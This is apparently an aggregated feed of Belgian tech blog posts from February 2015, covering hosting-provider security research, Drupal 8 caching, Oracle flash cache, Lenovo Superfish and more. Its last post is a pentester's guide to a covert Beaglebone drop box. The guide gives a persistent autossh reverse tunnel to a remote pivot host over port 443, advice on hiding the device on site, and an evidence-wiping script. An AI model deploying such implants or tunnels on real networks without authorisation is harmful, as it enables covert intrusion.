The second part of the presentation focused on hosting providers. Do they complain? How do they detect malicious activity (if they detect it)? Do they care about security? Today hosting solutions are cheap and there are millions of websites maintained by inexperienced owners. This makes the attack surface very large. Hosting providers should play a key role in helping users. Is that the case? Alas, according to Aurélien, no! To perform the tests, EURECOM registered multiple shared hosting accounts at multiple providers, deployed web apps and simulated attacks:

In the first phase, they just observed the provider’s reaction. The second was to contact the provider to report an abuse (one real and one illegitimate). Twelve providers were tested from the top US-based ones and ten from other regions (Europe, Asia, …). What were the results?
  • At registration time, some did some screening (like phone calls), some verified the provided data and only three performed a 1-click registration (no check at all).
  • Some have URL blacklisting in place.
  • Filtering occurs at OS level (e.g. to prevent callbacks on suspicious ports) but the detection rate is low in general.
  • About the abuse reports: 50% never replied; among the others, 64% replied within one day. There was a wide variety of reactions.
  • Some providers offer (read: sell) security add-ons. Five out of six did not detect anything. One detected but never notified the customer.
To conclude the research: most providers fail to provide proper security services; services are cheap, so do not expect good service. Note that the provider names were not disclosed by Aurélien!
It was a very nice event to start the year 2015! Good topics and good speakers!

by Xavier at February 24, 2015 10:28 PM

Mattias Geniar

Firefox 36 Fully Supports HTTP/2 Standard

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

Now that's fast.

Support for the full HTTP/2 protocol. HTTP/2 enables a faster, more scalable, and more responsive web.

Just 2 weeks after the HTTP/2 spec was declared final, Firefox 36 ships with the updated HTTP/2 protocol. Well played, Mozilla.

The post Firefox 36 Fully Supports HTTP/2 Standard appeared first on ma.ttias.be.

by Mattias Geniar at February 24, 2015 09:28 PM

Wim Coekaerts

Oracle Linux and Database Smart Flash Cache

One, sometimes overlooked, cool feature of the Oracle Database running on Oracle Linux is called Database Smart Flash Cache.

You can find an overview of the feature in the Oracle Database Administrator's Guide. Basically, if you have flash devices attached to your server, you can use this flash memory to increase the size of the buffer cache. So instead of aging blocks out of the buffer cache and having to go back to reading them from disk, they move to the much, much faster flash storage as a secondary fast buffer cache (for reads, not writes).

Some scenarios where this is very useful: you have huge tables and huge amounts of data, a very, very large database with tons of query activity (let's say many TB), and your server is limited to a relatively small amount of main RAM (let's say 128 or 256G). In this case, if you were to purchase and add a flash storage device of 256G or 512G (for example), you can attach this device to the database with the Database Smart Flash Cache feature and increase the buffer cache of your database from 100G or 200G to 300-700G on that same server. In a good number of cases this will give you a significant performance improvement, without having to purchase a new server that handles more memory or flash storage large enough to hold your many TB of data instead of rotational storage.

It is also incredibly easy to configure.

1. install Oracle Linux (I installed Oracle Linux 6 with UEK3)
2. install Oracle Database 12c (this would also work with 11g - I installed 12.1.0.2.0 EE)
3. add a flash device to your system (for the example I just added a 1GB device showing up as /dev/sdb)
4. attach the storage to the database in sqlplus
Done.

$ ls /dev/sdb
/dev/sdb

$ sqlplus '/ as sysdba'

SQL*Plus: Release 12.1.0.2.0 Production on Tue Feb 24 05:46:08 2015

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production
With the Partitioning, OLAP, Advanced Analytics and Real Application Testing options

SQL>  alter system set db_flash_cache_file='/dev/sdb' scope=spfile;

System altered.

SQL> alter system set db_flash_cache_size=1G scope=spfile;

System altered.

SQL> shutdown immediate;
Database closed.
Database dismounted.
ORACLE instance shut down.

SQL> startup
ORACLE instance started.

Total System Global Area 4932501504 bytes
Fixed Size		    2934456 bytes
Variable Size		 1023412552 bytes
Database Buffers	 3892314112 bytes
Redo Buffers		   13840384 bytes
Database mounted.
Database opened.

SQL> show parameters flash

NAME				     TYPE	 VALUE
------------------------------------ ----------- ------------------------------
db_flash_cache_file		     string	 /dev/sdb
db_flash_cache_size		     big integer 1G
db_flashback_retention_target	     integer	 1440

SQL> select * from v$flashfilestat; 

FLASHFILE#
----------
NAME
--------------------------------------------------------------------------------
     BYTES    ENABLED SINGLEBLKRDS SINGLEBLKRDTIM_MICRO     CON_ID
---------- ---------- ------------ -------------------- ----------
	 1
/dev/sdb
1073741824	    1		 0		      0 	 0

You can get more information on configuration and guidelines/tuning here. If you want selective control of which tables can use or will use the Database Smart Flash Cache, you can use the ALTER TABLE command. See here. Specifically the STORAGE clause. By default, the tables are aged out into the flash cache but if you don't want certain tables to be cached you can use the NONE option.

alter table foo storage (flash_cache none);

This feature can really make a big difference in a number of database environments and I highly recommend taking a look at how Oracle Linux and Oracle Database 12c can help you enhance your setup. It's included with the database running on Oracle Linux.
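
For completeness: the STORAGE clause also accepts KEEP and DEFAULT values for FLASH_CACHE (see the ALTER TABLE documentation linked above). A quick sketch, assuming a hot table named foo that you want to favour in the cache:

SQL> alter table foo storage (flash_cache keep);     -- favour keeping foo's blocks in the flash cache
SQL> alter table foo storage (flash_cache default);  -- revert to the default aging behaviour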

Here is a link to a white paper that gives a bit of a performance overview.

by Wcoekaer-Oracle at February 24, 2015 08:07 PM

Dries Buytaert

5 things a government can do to grow its startup ecosystem

Building a successful company is really hard. It is hard no matter where you are in the world, but the difficulty is magnified in Europe, where people are divided by geography, regulation, language and cultural prejudice. If governments can provide European startups a competitive advantage, that could go a long way toward offsetting some of the disadvantages. In this post, I'm sharing some rough ideas for what governments could do to encourage a thriving startup ecosystem. It's my contribution to the Belgian startup manifesto (#bestartupmanifesto).

  1. Governments shouldn't obsess too much about making it easier to incorporate a company; while it is certainly nice when governments cut red tape, great entrepreneurs aren't going to be held back by some extra paperwork. Getting a company off the ground is by no means the most difficult part of the journey.
  2. Governments shouldn't decide what companies deserve funding or don't deserve funding. They will never be the best investors. Governments should play towards their strength, which is creating leverage for all instead for just a few.
  3. Governments can do quite a bit to extend a startup's runway (to compensate for the lack of funding available in Belgium). Relatively simple tax benefits result in less need for venture capital:
    • No corporate income taxes on your company for the first 3 years or until 1 million EUR in annual revenue.
    • No employee income tax or social security contributions for the first 3 years or until you hit 10 employees. Make hiring talent as cheap as possible; two employees for the price of one. (The cost of hiring an employee would effectively be the net income for the employee. The employee would still get a regular salary and social benefits.)
    • Loosen regulations on hiring and firing employees. Three-month notice periods shackle the growth of startups. Governments can provide more flexibility for startups to hire and fire fast; two-week notice periods for both incoming and outgoing employees. Employees who join a startup are comfortable with this level of job insecurity.
  4. Create "innovation hubs" that make neighborhoods more attractive to early-stage technology companies. Concentrate as many technology startups as possible in fun neighborhoods. Provide rent subsidies, free wifi and make sure there are great coffee shops.
  5. Build a culture of entrepreneurship. The biggest thing holding back a thriving startup community is not regulation, language, or geography, but a cultural prejudice against both failure and success. Governments can play a critical role in shaping the country's culture and creating an entrepreneurial environment where both failures and successes are celebrated, and where people are encouraged to better themselves economically through hard work and risk taking. In the end, entrepreneurship is a state of mind.

by Dries at February 24, 2015 07:15 PM

Les Jeudis du Libre

Mons, March 19 – SonarQube: another view of your software

Logo SonarQube
This Thursday, March 19, 2015 at 7pm, the 37th Mons session of the Jeudis du Libre de Belgique will take place.

The topic of this session: SonarQube: another view of your software

Theme: Quality|Development|Tools|Visualisation

Audience: everyone

Speaker: Dimitri Durieux (CETIC)

Location of this session: Campus technique (ISIMs) of the Haute Ecole en Hainaut, Avenue V. Maistriau, 8a, Salle Académique, 2nd building (see this map on the ISIMs website, and here on the Openstreetmap map).

Participation is free and only requires registering by name, preferably in advance, or at the entrance to the session. Please indicate your intention by signing up via the page http://jeudisdulibre.fikket.com/. The session will be followed by a friendly drink.

The Jeudis du Libre in Mons also enjoy the support of our partners: CETIC, Normation, OpenSides, MeaWeb, NextLab, Phonoid and Creative Monkeys.

If you are interested in this monthly series, feel free to consult the agenda and to subscribe to the mailing list in order to receive the announcements systematically.

As a reminder, the Jeudis du Libre aim to be spaces for exchange around Free Software topics. The Mons meetings take place every third Thursday of the month and are organised on the premises of, and in collaboration with, Mons university colleges and faculties involved in training computer scientists (UMONS, HEH and Condorcet), with the support of the non-profit LoLiGrUB, which is active in promoting free software.

Description: Software quality is a divisive subject: some consider it an extra cost and see it as a constraint, others on the contrary consider it an opportunity and see quality as a guide for their work. Quality in general means putting in place the conditions (organisation, tools, rules, team) that make it possible to meet the expressed needs. In the case of software development, this means delivering the customer's functional and non-functional requirements. We therefore distinguish functional quality (meeting the functional requirements) from non-functional quality (meeting the non-functional requirements). Against the extra cost induced by quality, one should thus weigh the cost induced by a lack of software quality. This lack of software quality is called technical debt.

SonarQube (formerly Sonar) is an open-source project for tracking the quality of software development. SonarQube is thus an open-source project for open source: indeed, open-source ecosystems such as OW2 and Polarsys (Eclipse) use it to assess the maturity of their projects. Unlike classic analysers (for example PMD or Checkstyle), SonarQube positions itself as a dashboard that integrates other analysers and helps with the interpretation of their results.

SonarQube offers a set of views over a portfolio of applications in order to manage the evolution of their technical debt. To feed these views, it relies on a plugin-oriented architecture that allows it to support more than twenty languages, from COBOL to Java, via C# or PHP. The plugin development API is open source, so it is possible to add specific plugins to support new languages, provide new views, or interface with existing tools.

by Didier Villers at February 24, 2015 08:16 AM

February 23, 2015

Frank Goossens

User Agent Madness

Just found this one in my http logfile;

Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

So one User Agent string mentioning 4 browsers (Mozilla, Safari, Chrome and finally Opera 27, which is the actual browser) and 3 rendering engines (Applewebkit, KHTML and Gecko)? There is a lot of web-history in those 127 characters.

by frank at February 23, 2015 06:27 AM

February 22, 2015

Dieter Adriaenssens

Buildtime Trend v0.2 released!

Visualise what's trending in your build process

Buildtime Trend Logo
What started as a few scripts to gain some insight in the duration of stages in a build process, has evolved into project Buildtime Trend, that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of a build process.

The major new features are support for parsing Travis CI build log files to retrieve timing data, and the introduction of the project as a service that gathers Travis CI generated timing data, hosts a dashboard with different charts and offers shield badges with different metrics.

Try it out!

The hosted service supports Open Source projects (public on GitHub) running their builds on Travis CI. Thanks to the kind people of Keen.io hosting the aggregated data, the hosted service is currently available for free for Open Source projects.
Get started! It's easy to set up in a few steps.

A bit more about Buildtime Trend

Dashboard example
Dashboard example
Buildtime Trend is an Open Source project that generates and gathers timing data of build processes. The aggregated data is used to create charts to visualise trends of the build process.
These trends can help you gain insight in your build process : which stages take most time? Which stages are stable or have a fluctuating duration? Is there a decrease or increase in average build duration over time?
With these insights you can improve the stability of your build process and make it more efficient.

The generation of timing data is done with either a client or by using Buildtime Trend as a Service.
The Python-based client generates custom timing tags for any shell-based build process and can easily be integrated. A script processes the generated timing tags when the build is finished and stores the results.
Buildtime Trend as a Service gets timing and build related data by parsing the logfiles of a build process. Currently, Travis CI is supported. Simply trigger the service at the end of a Travis CI build and the parsing, aggregating and storing of the data is done automatically.

The aggregated build data is used to generate a dashboard with charts powered by the Keen.io API and data store.

Check out the website for more information about the project, follow us on Twitter, or subscribe to the community mailing list.

by Dieter Adriaenssens (noreply@blogger.com) at February 22, 2015 08:35 PM

February 20, 2015

Frank Goossens

Music from Our Tube; Ala.ni

Ala.ni appears to be

a London-based singer/songwriter, producer & video director who already worked with such artists as Mary J Blige, Damon Albarn and Andrea Bocelli

While that may sound a lot like your typical name-dropping in a press release of the next would-be-star, her music has a distinct jazzy forties-yet-modern feel to it and above all it’s really beautiful;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Ala.ni will issue an EP in March and the first song from that, Cherry Blossom, is well worth a listen too!

by frank at February 20, 2015 04:03 PM

Wouter Verhelst

LOADays 2015

Looks like I'll be speaking at LOADays again. This time around, at the suggestion of one of the organisers, I'll be speaking about the Belgian electronic ID card, for which I'm currently employed as a contractor to help maintain the end-user software. While this hasn't been officially confirmed yet, I've been hearing some positive signals from some of the organisers.

So, under the assumption that my talk will be accepted, I've started working on my slides. The intent is to explain how the eID middleware works (in general terms), how the Linux support is supposed to work, and what to do when things fail.

If my talk doesn't get rejected at the final hour, I will continue my uninterrupted "speaker at loadays" streak, which has been running since loadays' first edition...

February 20, 2015 10:47 AM

February 19, 2015

Dries Buytaert

Making Drupal 8 fly

In my travels to talk about Drupal, everyone asks me about Drupal 8's performance and scalability. Modern websites are much more dynamic and interactive than 10 years ago, which makes it harder to build sites that are also fast. It made me realize that maybe I should write up a summary of some of the most exciting performance and scalability improvements in Drupal 8. After all, Drupal 8 will leapfrog many of its competitors in terms of how to architect and scale modern web applications. Many of these improvements benefit both small and large websites, but also allow us to build even bigger websites with Drupal.

More precise cache invalidation

One of the strategies we employ in making Drupal fast is "caching". This means we try to generate pages or page elements one time and then store them so future requests for those pages or page elements can be served faster. If an item is already cached, we can simply grab it without going through the building process again (known as a "cache hit"). Drupal stores each cache item in a "cache bin" (a database table, Memcache object, or whatever else is appropriate for the cache backend in use).

In Drupal 7 and before, when one of these cache items changes and it needs to be re-generated and re-stored (the cache gets "invalidated"), you can only delete a specific cache item, clear an entire cache bin, or use prefix-based invalidation. None of these three methods allow you to invalidate all cache items that contain data of, say, user 200. The only method that is going to suffice is clearing the entire cache bin, and this means that usually we invalidate way too much, resulting in poor cache hit ratios and wasted effort rebuilding cache items that haven't actually changed.

This problem is solved in Drupal 8 thanks to the concept of "cache tags": each cache item can have any number of cache tags. A cache tag is a compact string that describes the object being cached. Thanks to this extra metadata, we can now delete all cache items that use the user:200 cache tag, for example. This means we've deleted all the cache items we must delete, but not a single one more: optimal cache invalidation!

Drupal cache tags

Example cache tags for different cache IDs.

And don't worry, we also made sure to expose the cache tags to reverse proxies, so that efficient and accurate invalidation can happen throughout a site's entire delivery architecture.
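
To make this concrete, here is a minimal sketch (my own illustration, not taken from Drupal core) of how module code attaches and invalidates cache tags in Drupal 8, using the standard '#cache' metadata on a render array:

<?php
use Drupal\Core\Cache\Cache;

// Declare what this piece of output depends on.
$build = [
  '#markup' => 'Latest article teaser goes here',
  '#cache' => [
    'tags' => ['user:200', 'node:5'],
  ],
];

// Later, when user 200 is updated, every cache item tagged 'user:200'
// is invalidated in one call -- and nothing more.
Cache::invalidateTags(['user:200']);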

More precise cache variation

While accurate cache invalidation makes caching more efficient, there is more we did to improve Drupal's caching. We also make sure that cached items are optimally varied. If you vary too much, duplicate cache entries will exist with the exact same content, resulting in inefficient usage of caches (low cache hit ratios). For example, we don't want a piece of content to be cached per user if it is the same for many users. If you vary too little, users might see incorrect content as two different cache entries might collide. In other words, you don't want to vary too much nor too little.

In Drupal 7 and before, it's easy to program any cached item to vary by user, by user role, and/or by page, and could even be configured through the UI for blocks. However, more targeted variations (such as by language, by country, or by content access permissions) were more difficult to program and not typically exposed in a configuration UI.

In Drupal 8, we introduced a Cache Context API to allow developers and site builders to express these variations and to make them automatically available in the configuration UI.

Drupal cache contexts
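
And as a hedged illustration of cache contexts (the variable name is invented for the example), declaring variations is simply a matter of listing contexts in the same '#cache' metadata:

// This output varies per permission set and per interface language,
// but is shared by all users with the same combination.
$build = [
  '#markup' => $welcome_text,
  '#cache' => [
    'contexts' => ['user.permissions', 'languages:language_interface'],
    'max-age' => 3600,
  ],
];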

Server-side dynamic content substitution

Usually a page can be cached almost entirely except for a few dynamic elements. Often a page served to two different authenticated users looks identical except for a small "Welcome $name!" and perhaps their profile picture. In Drupal 7, this small personalization breaks the cacheability of the entire page (or rather, requires a cache context that's way too granular). Most parts of the page, like the header, the footer and certain blocks in the sidebars don't change often nor vary for each user, so why should you regenerate all those parts at every request?

In Drupal 8, thanks to the addition of #post_render_cache, that is no longer the case. Drupal 8 can render the entire page with some placeholder HTML for the name and profile picture. That page can then be cached. When Drupal has to serve that page to an authenticated user, it will retrieve it from the cache, and just before sending the HTML response to the client, it will substitute the placeholders with the dynamically rendered bits. This means we can avoid having to render the page over and over again, which is the expensive part, and only render those bits that need to be generated dynamically!

Client-side dynamic content substitution

Some things that Drupal has been rendering for the better part of a decade, such as the "new" and "updated" markers on comments, have always been rendered on the server. That is not ideal because these markers are different for every visitor and as a result, it makes caching pages with comments difficult.

The just-in-time substitution of placeholders with dynamic elements that #post_render_cache provides us can help address this. In some cases, as is the case with the comment markers, we can even do better and offload more work from the server to the client. In the case for comment markers, a certain comment is posted at a certain time — that doesn't vary per user. By embedding the comment timestamps as metadata in the DOM with a data-comment-timestamp="1424286665" attribute, we enable client-side JavaScript to render the comment markers, by fetching (and caching on the client side) the “last read” timestamp for the current user and simply comparing these numbers. Drupal 8 provides some framework code and API to make this easy.

A "Facebook BigPipe" render pipeline

With Drupal 8, we're very close to taking the client-side dynamic content substitution a step further, just like some of the world's largest dynamic websites do. Facebook has 1.35 billion monthly active users all requesting dynamic content, so why not learn from them?

The traditional page serving model has not kept up with the increase of highly personalized websites where different content is served to different users. In the traditional model, such as Drupal 7, the entire page is generated before it is sent to the browser: while Drupal is generating a page, the browser is idle and wasting its cycles doing nothing. When Drupal finishes generating the page and sends it to the browser, the browser kicks into action, and the web server is idle. In the case of Facebook, they use BigPipe. BigPipe delivers pages asynchronously instead; it parallelizes browser rendering and server processing. Instead of waiting for the entire page to be generated, BigPipe immediately sends a page skeleton to the client so it can start rendering that. Then the remaining content elements are requested and injected into their correct place. From the user's perspective the page is rendered progressively. The initial page content becomes visible much earlier, which improves the perceived speed of the site.

We've made significant improvements to the way Drupal 8 renders pages (presentation). By default, Drupal 8 core still implements the traditional model of assembling these pieces into a complete page in a single server-side request, but the independence of each piece and the architecture of the new rendering pipeline enable different “render strategies" to be experimented with — different methods for dynamic content assembly, such as BigPipe, Edge Side Includes, or other ideas for making the most optimal use of client, server, content delivery networks and reverse proxies. In all those examples, the idea is that we can send the primary content first so the client can start rendering that. Then we send the remaining Drupal blocks, such as the navigation menu or a 'Related articles' block, and have the browser, content delivery network or reverse proxy assemble or combine these blocks into a page.

Drupal render pipeline

A snapshot of the Drupal 8 render pipeline diagram that highlights where alternative render strategies can be implemented.

Some early experiments by Wim Leers in Acquia's OCTO show that we can improve performance by a factor of about 2 compared to a recent Drupal 8 development snapshot. These breakthroughs are enabled by leveraging the various improvements we made to Drupal 8.

And much more

But that is not all. The Drupal community has actually done much more, including: complete asset dependency information (which allowed us to ensure zero JavaScript is loaded by default for anonymous users and send less data on AJAX requests), pluggable CSS/JS aggregation and minification (to support more optimal optimization algorithms), and more. We've also made sure Drupal 8 is fast by default, by having better defaults: CSS/JS aggregation enabled, JS assets being loaded from the bottom, block caching enabled, and so on.

All in all, there is a lot to look forward to in Drupal 8!

Special thanks to Acquia's Wim Leers, Alex Bronstein and Angie Byron for their contributions to this blog post.

by Dries at February 19, 2015 07:57 PM

Mattias Geniar

Tearing Down Lenovo’s Superfish Statement

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

The last 48 hours have been interesting, given Lenovo has been caught installing Man-in-the-Middle root certificates on newly purchased laptops via spyware known as Superfish.

It's even more interesting now that the private key to that root certificate has been compromised. The password "komodia" tracks back to a known/commercial SSL hijacker.

It's a sign of the bad state IT security is in nowadays. Network switches and routers are intercepted on their way to ISPs to install backdoors, hard disk drives have NSA spyware in their firmware from the factories and now consumer laptops have spyware and man-in-the-middle certificates on them.

If we can't even trust the hardware we use, how are we ever going to be able to trust the software?

But what disturbs me the most in this recent Lenovo scandal, is their most recent news announcement on Superfish.

Superfish was previously included on some consumer notebook products shipped in a short window between September and December ...

This short window means the entire Q4 of 2014. So let's take the numbers published for Q4 2013 from Lenovo. The numbers may be 2 years old, but Lenovo isn't selling any less. So if Q4 2013 resulted in "$4.8 billion in sales (accounting for 51 percent of the Company’s overall sales)", how many laptops do you think those are?

An average selling price of $750 (just a wild guess, it's probably less) would result in a little over 5.630.000 laptops sold.

Diminishing the Superfish impact by saying "included on some consumer notebooks" is a smack in the face.

Superfish has completely disabled server side interactions (since January) on all Lenovo products so that the product is no longer active. This disables Superfish for all products in market.

Oh good. The threat is over.

Except it isn't. The CA certificate is still present on those laptops. The spyware itself is still installed on those machines. Guess what Lenovo, if you can disable it server-side, it can be enabled again server-side as well. You've temporarily disabled part of the problem while ignoring the bigger picture and providing a false sense of security.

Users are given a choice whether or not to use the product.

How is that even remotely true, if it's pre-installed on laptops without asking the user first?

The relationship with Superfish is not financially significant; our goal was to enhance the experience for users. We recognize that the software did not meet that goal and have acted quickly and decisively.

The primary goal of Superfish was to show ads and inject them into various places. This is most likely the true reason for inserting their own CA certificate: to still be able to inject ads on SSL/TLS-enabled sites.

If the primary goal of an application is to show ads, it's a financial choice. While it may not be financially significant to Lenovo, the choice to embed Superfish was made based on dollars. How much could this make us each month? What would Superfish pay Lenovo? How much money can they gain from this deal?

The only reason the relationship with Superfish existed in the first place, was a financial reason. Nothing else, Lenovo.

In this case, we have responded quickly to negative feedback, and taken decisive actions to ensure that we address these concerns.

This is where Lenovo missed the point entirely. There should never have been a reaction in the first place. They're selling laptops to consumers. That gives them 2 distinct priorities: the laptops should A) work and B) not contain any spyware. I'd love to see B) take priority over A), but for Lenovo A) will come first.

How did Superfish make it through internal reviews at Lenovo? How can any technical engineer feel OK allowing and approving this to be pre-installed on consumer laptops?

The private key for the Superfish certificate is exposed. Out of those 5.630.000 laptops sold, I'd venture a guess that 5.600.000 owners have no clue this happened and will continue to live their lives with a pre-compromised computer. Just making online payments as if nothing happened.

Good work Lenovo. Way to destroy our faith in IT security just a little more.

The post Tearing Down Lenovo’s Superfish Statement appeared first on ma.ttias.be.

by Mattias Geniar at February 19, 2015 07:10 PM

Xavier Mertens

My Little Pwnie Box

Beaglebone
As a pentester, I’m always trying to find new gadgets and tools to improve my toolbox. A few weeks ago, I received my copy of Dr Philip Polstra’s book: “Hacking and Penetration Testing with Low Power Devices” (ISBN: 978-0-12-800751-8). I had a very interesting chat with Phil during the last BruCON edition and I was impressed by his “lunch box“. That’s why I decided to buy his book.

This post is not a review of Phil’s book (here is one). It’s just a wrap-up of my own “little pwnie” box setup. The book is based on the Beaglebone hardware. It’s a credit-card-sized computer that can run Linux (amongst other operating systems) and has plenty of I/O. Much more powerful than the classic Raspberry, its size and the fact that it can easily be powered via USB, batteries or a regular power adapter (the book has a chapter dedicated to powering the Beaglebone) make it a very nice choice for building a pentesting device. The primary goal of such a small computer is to be dropped discreetly somewhere to open a door on your target’s network. While a Beaglebone has enough power to perform basic tasks during a pentest engagement, don’t expect to run a distribution like Kali on such hardware! That’s why Phil maintains his own distribution dedicated to the Beaglebone platform: The Deck. As described on the website, add-ons are available to extend the capabilities, like using 802.15.4 networking or using drones for aerial capabilities (AirDeck) like my Aircrack-One project.

I did not use Phil’s distribution because I like to build things by myself and understand how they work. I set up my own Beaglebone from scratch. The base OS is a Ubuntu 14.04-LTS compiled for the ARM processor. The procedure is available on ARMhf.com. Then I installed my favourite tools, e.g.:

As Phil explains in the book, some tools are available as standard packages and a simple “apt-get install xxx” will do the job. Others must be compiled. My recommendation is to fetch the source code via github.com (or any other repository service) and compile it on the Beaglebone. Even if the tool is available as a package, there are always differences. Nmap is a good example: many more NSE scripts are available in the repository. Why truecrypt? Because the Beaglebone will be dropped in a hostile environment, it’s a good idea to store all your collected data and evidence in an encrypted container.

Aircrack-ng works perfectly with my AWUS036NH wireless card (a good old standard card for pentesters) but my primary goal is not to use my Beaglebone for wireless pentests. I’m the happy owner of a Pineapple for this purpose! My goal is to build a box that can be dropped somewhere, connected to a network and phone home. This is not covered in Phil’s book, so here is my contribution.

I’ve got a Huawei 3G USB stick with a data-only card. This HSDPA modem is recognised out-of-the-box by most Linux distributions. It’s the same for the Beaglebone:

[ 16.364815] usb 2-1: new high-speed USB device number 3 using musb-hdrc
[ 16.524132] usb 2-1: device v12d1 p1001 is not supported
[ 16.529904] usb 2-1: New USB device found, idVendor=12d1, idProduct=1001
[ 16.529919] usb 2-1: New USB device strings: Mfr=2, Product=1, SerialNumber=0
[ 16.529929] usb 2-1: Product: HUAWEI Mobile
[ 16.529939] usb 2-1: Manufacturer: HUAWEI Technology

To manage dialup connections, Ubuntu has NetworkManager, but I chose not to install a GUI on my Beaglebone. The de-facto tool to manage dialup connections from the command line is wvdial. I remember what a nightmare it was to configure PPP in the ’90s; wvdial takes care of this for you. To test if your modem is compatible, simply use wvdialconf:

root@beagle:/etc# wvdialconf /etc/wvdial.conf
Editing `/etc/wvdial.conf'.

Scanning your serial ports for a modem.

Modem Port Scan<*1>: S0 S1 S2 S3 
ttyUSB0<*1>: ATQ0 V1 E1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB0<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB0<*1>: Speed 9600: AT -- OK
ttyUSB0<*1>: Max speed is 9600; that should be safe.
ttyUSB0<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 2400 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- failed with 9600 baud, next try: 9600 baud
ttyUSB1<*1>: ATQ0 V1 E1 -- and failed too at 115200, giving up.
ttyUSB2<*1>: ATQ0 V1 E1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 Z -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 -- OK
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK
ttyUSB2<*1>: Modem Identifier: ATI -- Manufacturer: huawei
ttyUSB2<*1>: Speed 9600: AT -- OK
ttyUSB2<*1>: Max speed is 9600; that should be safe.
ttyUSB2<*1>: ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0 -- OK

Found a modem on /dev/ttyUSB0.
Modem configuration written to /etc/wvdial.conf.
ttyUSB0<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"
ttyUSB2<Info>: Speed 9600; init "ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0"

Then edit your configuration to match your mobile operator requirements. Mine looks like this:

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","<your_apn>"
Modem Type = Analog Modem
Baud = 115200
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
Phone = *99#
Password = <your_apn_password>
Username = <your_apn_username>
Check Def Route = yes
Auto Reconnect = yes

The important information is in bold. The next step is to bring up the 3G connection at boot time. It’s easy with Ubuntu; add the following lines to your /etc/network/interfaces file:

auto ppp0
iface ppp0 inet wvdial

At this point, my 3G USB modem connected but one problem remained: If the Ethernet interface was already up with a default gateway, no new default route was added via the ppp0 interface. To fix this, the following file has to be modified: /etc/ppp/peers/wvdial:

noauth
name wvdial
usepeerdns
defaultroute
replacedefaultroute

Now that the Beaglebone is connected to the world, it is not yet very useful because we don’t know how to reach it. Chances are that, on a 3G/4G network, it received an RFC 1918 IP address and connects to the Internet via NAT. The best way is to use SSH to connect to a host and set up a reverse shell. Another key requirement is “persistence” (like a real malicious program): we must be sure that the SSH session will remain available all the time. To achieve this, there exists a tool called “autossh” which takes care of this. Once the standard package is installed, create a configuration file /etc/init/autossh.conf:

# autossh startup Script

description "AutoSSH Daemon Startup"

start on net-device-up
stop on runlevel [01S6]

respawn
respawn limit 5 60 # respawn max 5 times in 60 seconds

script
export AUTOSSH_PIDFILE=/var/run/autossh.pid
export AUTOSSH_POLL=60
export AUTOSSH_FIRST_POLL=30
export AUTOSSH_GATETIME=0
export AUTOSSH_DEBUG=1
autossh -M 0 -4 -N -R 2222:127.0.0.1:22 -o "ServerAliveInterval 60" -o "ServerAliveCountMax 3" -o BatchMode=yes -o StrictHostKeyChe
cking=no -i /root/.ssh/id_rsa -p 443 user@pivot-host
end script

What does it do? An SSH session will be opened to the machine “pivot-host” with the login “user“. The authentication is performed with the private key stored in /root/.ssh/id_rsa (don’t forget to copy the public key to ‘pivot-host’). Change the default port (22) to something more stealthy; personally, I like to do SSH over TCP/443, which is often open to the Internet. The reverse shell is created with “-R 2222:127.0.0.1:22“. It means that a connection to port 2222 on pivot-host will be forwarded to port 22 on the Beaglebone’s loopback interface.

Connect the 3G USB stick, boot the Beagle and a few seconds later, you’ll get a reverse shell opened on your pivot host. You are ready to connect back to the Beaglebone:

root@pivot:/tmp# netstat -anp|grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN 20549/sshd: xavier
tcp6 0 0 :::2222 :::* LISTEN 20549/sshd: xavier
root@pivot:/tmp# ssh -p 2222 user@127.0.0.1
user@127.0.0.1's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.14.4.1-bone-armhf.com armv7l)

* Documentation: https://help.ubuntu.com/
Last login: Wed Feb 18 20:58:43 2015 from mclt0040-eth0.home.rootshell.be
xavier@beagle:~$

Now drop your Beaglebone in a nice place at your target’s location, like a meeting room behind a computer (and use one USB port to power it), and walk away… Happy hunting! One last tip: when your micro SD card is ready, make a copy of it to easily re-install new Beaglebones. They are cheap and can be left onsite after your engagement. Just bill it to your customer. If you leave it onsite, be sure to have a suicide-script to wipe the data on the SD card!
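
For that suicide-script, a minimal sketch could look like the following (the paths are assumptions based on the setup above -- adapt them to wherever you store your container and keys):

#!/bin/bash
# wipe.sh - destroy sensitive material before abandoning the device
shred -u -z /root/evidence.tc      # the truecrypt container holding collected data (hypothetical path)
shred -u -z /root/.ssh/id_rsa      # the private key used for the autossh reverse shell
rm -f /root/.bash_history
shutdown -h now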

by Xavier at February 19, 2015 03:02 PM

